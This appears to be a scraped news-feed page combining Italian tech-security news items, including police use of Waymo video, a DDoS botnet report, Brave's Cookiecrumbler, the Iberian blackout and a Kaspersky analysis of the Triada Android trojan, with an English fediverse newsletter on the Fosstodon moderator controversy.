Nel filmato pubblicato sul canale YouTube del dipartimento della polizia, mostra il momento dell’incidente e la dicitura “Waymo Confidential Commercial Information”. In questo modo è stato mostrato al pubblico l’aspetto esatto della registrazione video, pervenuta alla polizia in seguito a una richiesta ufficiale da parte di un’azienda fornitrice di servizi di robotaxi.
La situazione evidenzia il crescente interesse delle forze dell’ordine nell’utilizzare riprese video di veicoli autonomi come prova. Precedenti simili sono stati registrati a San Francisco e nella contea di Maricopa, in Arizona, dove la polizia ha emesso mandati di cattura per accedere alle registrazioni dei veicoli Waymo. Sono state inoltre inoltrate richieste di dati video ad altre aziende, tra cui Tesla, Cruise e gli utenti delle telecamere di sorveglianza Ring, ampiamente utilizzate negli Stati Uniti.
Waymo sta espandendo attivamente la sua presenza a Los Angeles. Secondo i residenti locali, le auto dell’azienda sono diventate un elemento familiare del paesaggio urbano. Di recente è stato annunciato che l’area operativa del robotaxi sarà ampliata e che presto inizieranno i test sulle autostrade cittadine. Tutto questo significa una sola cosa: sempre più telecamere si muovono lungo le strade, registrando in tempo reale ciò che accade.
In passato, la polizia di Los Angeles ha fatto ricorso ad altri dispositivi mobili per le riprese video, tra cui un robot autonomo per la consegna di cibo. Il caso Waymo dimostra che la polizia continua a esplorare nuovi modi per ottenere prove visive, andando oltre le telecamere di sorveglianza installate su edifici o persone private.
L’azienda stessa sottolinea di non trasferire dati video di propria iniziativa. Un portavoce di Waymo ha affermato che le informazioni saranno accessibili solo tramite richiesta formale, come un mandato, una citazione in giudizio o un altro documento giuridicamente vincolante. Ciascuna richiesta di questo tipo viene sottoposta a revisione legale e, se la formulazione è troppo ampia, l’azienda può limitare la quantità di informazioni fornite o rifiutarsi di fornirle del tutto.
Waymo afferma anche sul suo sito web: informa , che organizza eventi formativi per il personale dei servizi di emergenza. Stiamo parlando di oltre 18.000 soccorritori di 75 agenzie che hanno seguito una formazione su come interagire con veicoli autonomi durante incidenti o altri eventi.
La richiesta di commenti da parte dei giornalisti è rimasta senza risposta da parte della polizia di Los Angeles. Tuttavia, il fatto stesso che il video sia stato pubblicato suggerisce che le auto senza conducente si stanno gradualmente trasformando in testimoni involontari dei crimini urbani e in parte del meccanismo per investigarli.
Gli specialisti di Curator (ex Qrator Labs) hanno preparato un rapporto per il primo trimestre di quest’anno. Il numero totale di attacchi è aumentato del 110% rispetto al primo trimestre del 2024 e gli esperti hanno anche scoperto una gigantesca botnetDDoS composta da 1,33 milioni di dispositivi.
Il forte aumento degli attacchi segue un aumento del 50% degli attacchi DDoS nel 2024, confermando la tendenza all’aumento degli incidenti, hanno affermato i ricercatori. Allo stesso tempo, la società esclude dalle sue statistiche gli incidenti con un’intensità inferiore a 1 Gbps dall’inizio dell’anno scorso.
La maggior parte degli attacchi DDoS ai livelli di trasporto e di rete (L3-L4) erano diretti ai settori IT e telecomunicazioni (26,8%), fintech (22,3%) ed e-commerce. (21,5%). In totale, questi tre segmenti hanno rappresentato il 70% di tutti gli attacchi L3-L4 nel primo trimestre. In termini di intensità, i valori di picco degli attacchi L3–L4 sono stati di soli 232 Gbps e 65 Mpps, significativamente inferiori ai record dell’anno scorso di 1140 Gbps e 179 Mpps. Tuttavia, secondo l’azienda, non ha senso parlare di una diminuzione dell’intensità degli attacchi: i valori mediani del bitrate e della velocità di trasmissione dei pacchetti superano notevolmente i livelli dell’anno scorso.
Anche per quanto riguarda la durata degli attacchi, il primo trimestre del 2025 si preannuncia piuttosto modesto. Ad esempio, l’incidente DDoS più lungo del trimestre è durato solo circa 9,6 ore. Si è trattato di un’ondata di UDP su un’organizzazione del microsegmento Petrolio e Gas.
La durata media degli attacchi è scesa da 71,7 minuti dell’anno scorso a 11,5 minuti nel primo trimestre del 2025. E il valore mediano è sceso da 150 a 90 secondi. Inoltre, i ricercatori hanno segnalato la scoperta di un’enorme botnet DDoS composta da 1,33 milioni di dispositivi. A titolo di paragone, si tratta di una cifra quasi sei volte superiore a quella della più grande botnet DDoS del 2024 (227.000 dispositivi) e quasi 10 volte superiore a quella della più grande botnet del 2023 (136.000 dispositivi).
L’attacco della botnet DDoS scoperta era diretto a un’organizzazione del micro-segmento “Bookmakers online” ed è durato circa 2,5 ore.
Si dice che la botnet sia composta principalmente da dispositivi ubicati in Brasile (51,1%), Argentina (6,1%), Russia (4,6%), Iraq (3,2%) e Messico (2,4%).
Si nota che la composizione di questa botnet assomiglia alla botnet più grande scoperta l’anno scorso, il che rientra nella tendenza di cui hanno parlato i ricercatori nel rapporto finale per il 2024: la creazione di botnet DDoS di grandissime dimensioni da dispositivi nei paesi in via di sviluppo sta guadagnando slancio.
Gli analisti attribuiscono questo fenomeno alla lentezza nella sostituzione dei dispositivi più vecchi che non ricevono più aggiornamenti, abbinata ai continui miglioramenti nella qualità della connessione. Per ragioni economiche, questi effetti sono particolarmente pronunciati nei paesi in via di sviluppo. Di conseguenza, un numero enorme di dispositivi vulnerabili connessi a Internet ad alta velocità crea le condizioni ideali per la formazione di grandi botnet, utilizzate per potenti attacchi DDoS.
Brave ha introdotto un nuovo strumento chiamato Cookiecrumbler, che mira a contrastare le notifiche intrusive sul consenso ai cookie. La sua particolarità era l’uso di modelli linguistici di grandi dimensioni (LLM) per la ricerca automatica di tali banner e l’organizzazione del processo del loro blocco attraverso una comunità aperta.
Il browser Brave bloccherà di default i banner di consenso ai cookie su tutti i siti web a partire dal 2022. Tuttavia, col tempo è diventato chiaro che il blocco di massa può portare a gravi interruzioni nel funzionamento dei siti, dall’interruzione del processo di ordinazione a problemi di visualizzazione delle pagine. Brave sottolinea che la rimozione impropria dei banner a volte provoca la visualizzazione di pagine vuote e l’interruzione dello scorrimento, rovinando l’esperienza dell’utente.
Cookiecrumbler risolve questo problema in modo più efficace. Lo strumento funziona in questo modo: analizza i siti web più popolari tramite server proxy in diverse regioni, scarica le loro pagine utilizzando Puppeteer e identifica i potenziali banner di consenso. Questi elementi vengono poi trasmessi a un modello linguistico per la classificazione e la generazione di proposte per bloccarli. I risultati dell’analisi vengono pubblicati su GitHub come problemi aperti, che vengono poi esaminati manualmente dalla community per ridurre al minimo il rischio di compromettere la funzionalità dei siti.
Questo approccio consente a Cookiecrumbler di identificare e bloccare automaticamente e regionalmente i banner senza aumentare significativamente il numero di falsi positivi. È importante sottolineare che l’intero processo è completamente separato dai dati degli utenti: lo strumento viene eseguito esclusivamente sui server Brave e non influisce sulle sessioni degli utenti reali. Per l’analisi vengono utilizzati elenchi pubblici di siti come Tranco, ai quali si accede tramite un proxy.
È proprio questa volontà di preservare la privacy la ragione per cui Cookiecrumbler non è ancora integrato direttamente nel browser Brave. L’azienda afferma che lo strumento verrà integrato nel prodotto solo dopo essere stato completamente testato per garantirne il rispetto degli standard interni di sicurezza e privacy.
Poiché Cookiecrumbler è open source su GitHub, può essere utilizzato non solo dagli sviluppatori di Brave, ma da chiunque, dai creatori di altri strumenti di protezione della privacy agli amministratori di siti e ai revisori della sicurezza. Ciò apre la possibilità di una personalizzazione più precisa dei filtri di blocco e di migliorare l’esperienza utente senza compromettere la funzionalità dei siti web.
Ancora non sono chiari i motivi che hanno causato un grave Blackout in Spagna e Portogallo nelle ultime ore.
Vaste aree sono rimaste senza energia elettrica, scatenando un’ondata di speculazioni sulle possibili cause dell’interruzione. Secondo quanto riportato dalla BBC, la REN (Redes Energéticas Nacionais) ha riportato di un raro fenomeno atmosferico in Spagna, dovuto a variazioni estreme di temperatura, ha causato interruzioni della fornitura di energia elettrica in tutta la penisola iberica.
Georg Zachmann, ricercatore senior presso Bruegel, un think tank di Bruxelles, ha affermato che il sistema ha subito “disconnessioni a cascata delle centrali elettriche” – tra cui una in Francia – quando la frequenza della rete è scesa al di sotto dello standard europeo di 50 Hz.
Nella nota non è stato specificato di che tipo di evento si tratti. Al momento, le autorità spagnole non hanno ancora fornito una risposta ufficiale in merito a questa spiegazione, lasciando spazio a molte ipotesi.
REN (Rede Eletrica Nacional) ha affermato che era “impossibile” prevedere quando la corrente elettrica potesse essere ripristinata e che il ripristino avrebbe potuto richiedere fino a una settimana. In precedenza, il responsabile del gestore della rete elettrica spagnola, Red Electrica, aveva affermato che il ripristino avrebbe potuto richiedere dalle sei alle dieci ore.
Red Electrica ha affermato che in alcune zone dell’ovest, del sud e del nord la corrente elettrica è già stata ripristinata.
Parallelamente agli eventi, su uno dei canali Telegram del collettivo NoName057(16) – noto gruppo di hacktivisti filorussi – è apparso il seguente messaggio: “Anticipiamo i russofobi europei: la colpa di tutto è degli hacker russi di NoName057(16)”. Una frase che ha subito attirato l’attenzione, pur senza prove concrete a supporto. Parallelamente anche un’altra cyber gang nota dome DarkStorm, ha riportato sul canale twitter “Oggi, noi e il team noname057 siamo riusciti a tagliare l’elettricità in alcuni paesi della NATO”.
Come spesso accade in questi casi, resta da verificare se vi sia un effettivo collegamento tra questa rivendicazione e gli eventi reali. Non è raro, infatti, che gruppi hacktivisti cerchino di attribuirsi episodi di grande impatto ancora in fase di analisi per guadagnare visibilità mediatica.
I risultati preliminari dell’Agenzia dell’Unione Europea per la Cybersecurity (ENISA) si discostano dall’ipotesi di un attacco informatico. Un portavoce ha dichiarato: “Per il momento, l’indagine sembra indicare un problema tecnico/di cablaggio”. L’ENISA ha affermato che sta “monitorando attentamente” la situazione e rimane “in contatto con le autorità competenti a livello nazionale e dell’UE” riporta il telegraph.
Secondo i dati raccolti, i blackout si sono verificati in un contesto già particolarmente teso a livello europeo, dove la sicurezza delle infrastrutture critiche è una priorità crescente in seguito all’intensificarsi delle minacce ibride e cyber.
Le nuove versioni di Android hanno aumentato significativamente la sicurezza del sistema, impedendo la modifica delle partizioni di sistema anche con diritti di superutente. Ciò ha portato a un risultato inaspettato: il malware preinstallato nel firmware del dispositivo è diventato quasi impossibile da rimuovere. I criminali informatici hanno sfruttato questa situazione inserendo i trojan direttamente nelle applicazioni di sistema.
Secondo un rapporto di Kaspersky Lab, ecco come si è evoluto il programma Triada, precedentemente noto per il loader Dwphon. Nel marzo 2025, gli esperti hanno scoperto una nuova versione di Triada incorporata nel firmware di smartphone contraffatti venduti tramite piattaforme online. Il Trojan ha infettato il processo Zygote, il processo padre di tutte le applicazioni Android, garantendo la completa compromissione del sistema.
Il Trojan Triada utilizza ora un’architettura complessa a più stadi. I suoi componenti vengono iniettati in ogni processo tramite una libreria di sistema binder.so modificata, incorporata nel file boot-framework.oat. Questa libreria si collega al processo Zygote ed esegue tre moduli: un modulo helper, la backdoor principale mms-core.jar e un modulo focalizzato sul furto di criptovaluta o sull’installazione di malware aggiuntivo.
Il modulo helper registra un intercettore di chiamata di metodo nei processi dell’applicazione, facilitando il successivo caricamento di funzioni dannose. La backdoor principale consente di scaricare nuovi moduli dannosi dai server di controllo in base alle caratteristiche del dispositivo e alle applicazioni installate.
Particolare attenzione viene rivolta agli attacchi alle applicazioni di criptovaluta. I moduli dannosi sostituiscono gli indirizzi dei portafogli crittografici nei campi di testo e nei codici QR, intercettano il contenuto degli appunti e possono anche installare APK dannosi senza l’intervento dell’utente.
Triada attacca attivamente le applicazioni più diffuse: Telegram, WhatsApp, Instagram, browser, Skype, LINE, TikTok e altre. Ogni applicazione ha i suoi moduli maligni unici che estraggono token di sessione, cookie, dati utente e sono persino in grado di intercettare ed eliminare i messaggi.
I moduli per Telegram, ad esempio, estraggono i token degli utenti ed eliminano i messaggi in base a schemi specifici. I moduli di WhatsApp possono inviare messaggi per conto della vittima ed eliminare i dati inviati. Su Instagram vengono rubati i file con i cookie delle sessioni attive e nei browser i link aperti vengono sostituiti con risorse pubblicitarie o di phishing.
Triada può anche trasformare uno smartphone infetto in un server proxy per reindirizzare il traffico degli aggressori o in un mezzo per inviare segretamente messaggi SMS per abbonarsi a servizi a pagamento. In alcuni casi, il modulo modifica la politica di invio degli SMS premium per aggirare le restrizioni del sistema.
Particolare attenzione va prestata al modulo Clipper, integrato nell’applicazione Google Play, che controlla la clipboard ogni due secondi alla ricerca di indirizzi di criptovaluta per sostituirli con quelli controllati dall’aggressore.
Un’analisi dei server C2 di Triada ha rivelato che gli aggressori sono riusciti a rubare oltre 264.000 dollari in criptovaluta negli ultimi mesi utilizzando lo spoofing degli indirizzi e il furto di credenziali. Secondo i dati di telemetria, sono oltre 4.500 i dispositivi infetti e la maggior parte delle infezioni è stata registrata nel Regno Unito, nei Paesi Bassi, in Germania, in Brasile e in altri Paesi.
Triada dimostra un elevato livello di formazione per sviluppatori; il codice del modulo contiene commenti in cinese. Sono state notate anche somiglianze con l’infrastruttura di un altro progetto dannoso, Vo1d, il che indica una possibile connessione tra i gruppi. La distribuzione di dispositivi infetti è associata alla fornitura di smartphone contraffatti, riconoscibili dalle impronte digitali del firmware falso. È possibile che i produttori dei dispositivi non fossero a conoscenza della minaccia.
Per ridurre al minimo le conseguenze dell’infezione, si consiglia di aggiornare il dispositivo con un firmware ufficiale, evitare di utilizzare programmi di messaggistica istantanea e portafogli elettronici finché il dispositivo non sarà pulito e installare una soluzione antivirus affidabile per prevenire attacchi simili in futuro.
Posts made by a Fosstodon server moderator on Reddit has caused some drama, leading to both Fosstodon admins to call it quits, a number of servers (threatening to) defederate from the Fosstodon server, leading to an uncertain future for the Fosstodon server.
Fosstodon drama
A few days ago someone published a post on Mastodon, with screenshots and links to posts made on Reddit by one of the Fosstodon moderators. In the linked posts, the Reddit account in question, which seemingly belongs to the Fosstodon moderator, holds various right-wing beliefs, ranging from defending the deportation of Mahmoud Khalil to claiming Democrat supporters are in a cult. Backlash to the Fosstodon server was swift and strong, with various calls and plans from other servers to defederate from Fosstodon, members of the Fosstodon server looking for other servers to move their account to, and a general condemnation from the wider community. Both Fosstodon admins have postedarticles declaring they are stepping down, citing not only the current drama as a reason, but that they see the work of being server admins as frustrating with little pay-off. One Fosstodon community member is considering to take over the administration of the server, though as of writing, that process is still ongoing and the outcome unclear.
Some thoughts and takeaways about what this drama says about the social side of federation on the network, and how different communities interact:
When a server moderators holds opinions other people view as problematic, the social cost of these views is partially extended to server users as well. See for example the account for fediverse streaming platform Owncast, which has an account on the Fosstodon server. Owncast says that they are getting messages that say they need to move servers, otherwise people will see them as Nazis. This blog post about another Fosstodon user explains a similar thought process, where it is rational for them to move to a different server, because they will be associated with the politics of the server moderator in question otherwise.
This behaviour has an impact on how people on the fediverse should find an instance they want to join. It turns out that knowing the political affiliations of server moderators is important, and that this is something that people should know about before joining a server. People will be judged for being on a server that has a moderator with toxic political views. As such, it becomes important for people to know this information beforehand: both that they will get judged for the politics of server moderators, as well as knowing what those political views actually are.
This is another indication of why the process of selecting a server when someone joins the fediverse is actually a challenge: important information that should impact server choice is not made available to users, nor is it made clear that this information is important in the first place.
The second takeaway from the situation is that it shows a need for fediverse servers to have a federation policy. How federation currently works on the fediverse is that servers are connected with each other by default, and the assumption is that servers can disconnect from each other for any reason, but will mostly do so only if one of the servers is misbehaving in some way. Freedom of association is one of the valuable features of the fediv erse. Server operators should be free to defederate from any other server, for any reason. Being able to defederate from another server because you strongly disagree with the politics from one of the server moderators is a good thing. But if this is a consistent policy of the server, it would do well to make this policy public and explicit. Servers defederating from each other can have significant impact on users, who suddenly can lose connections with their friends. A policy of defederating from other servers based on the expressed beliefs of server moderators is something that is not immediately obvious to new people joining the fediverse. There are absolutely valid reasons to do so, but it seems to me that formalising such a policy would be a good step towards making the culture on the fediverse more sustainable.
The third takeaway is that running a fediverse server is challenging, especially over longer periods of time. Both Fosstodon admins have called in quits in response to the most recent drama. Their blog posts explaining their perspectives is that this has been a long time coming, and that the Fosstodon server has been uncompensated work that they do not love doing for years now. Regardless of one’s perspective on how the admins handled the latest situation, it is a further indication that being a fediverse server admin is a challenging job, one that should not be expected that someone can do forever. This means that servers like Fosstodon need governance systems that allow for better and earlier rotation of administrative power. Fediverse software should also be better at dealing with the realities of admin burnout. The users who are transferring from Fosstodon to another server will lose their posts; Mastodon does only transfer the social graph, and not posting history. While ideally the majority of servers would have extensive governance systems in place that can help deal with admin burnout, the reality is that most servers do not. More fediverse software should provide better support for users having to move to different servers, including with their posts.
The Links
NLnet, a fund that contributes to many open-source initiatives with a long track record of support fediverse projects, has published the beneficiaries of their latest funding round. PeerTube has gotten another grant, and publisher Framasoft talked about more how the money will be spend in their 2025 roadmap. The other fediverse beneficiary is an OpenScience flavour of Bonfire. Bonfire is an upcoming fediverse platform with a broad range of features, but the platform has struggled to get to an actual release. Bonfire published a blog post about their ‘road to Bonfire 1.0’ in September 2023, and an update in October 2024 where they announced a bounty program to get contributions to improve performance of the app.
The Doo the Woo podcast, hosted by WordPress ActivityPub plugin developer Matthias Pfefferle, interviewed André Menrath. Menrath is working on a plugin to bring WordPress events to ActivityPub.
The Bad Space is a project where various fediverse servers share their blocklists to build an aggregate of fediverse servers that are potentially worth blocking. The project is now available for self-hosting.
Some new features for FediAlgo, a customisable timeline algorithm for Mastodon, including a ‘What’s Trending’ feature.
A writeup on how to make a blog site using Lemmy as data storage.
That’s all for this week, thanks for reading! You can subscribe to my newsletter to get all my weekly updates via email, which gets you some interesting extra analysis as a bonus, that is not posted here on the website. You can subscribe below:
Bonfire is inching ever closer towards a 1.0 release of its social offering, which is a landmark development for the project. But beneath the surface, there's a bigger story going on: rather than simp
@Notizie dall'Italia e dal mondo Oltre 22 morti a Jaramana, città a maggioranza drusa attaccata da miliziani delle nuove autorità di Damasco, e in altre località. Tra le vittime anche militari governativi Israele intanto bombarda "in difesa dei drusi" e porta avanti i
Al Wsis+20 si decide il futuro della rete: il modello multistakeholder minacciato da nuove spinte stataliste. L’Internet Corporation for Assigned Names and Numbers avverte: senza un “governo” inclusivo si andrebbe verso la frammentazione e il controllo geopolitico
@Informatica (Italy e non Italy 😁) L'adozione dell'IA in azienda richiede un approccio che bilanci correttamente le esigenze di innovazione, sicurezza e conformità normativa. Il tema è stato affrontato nel corso di diversi
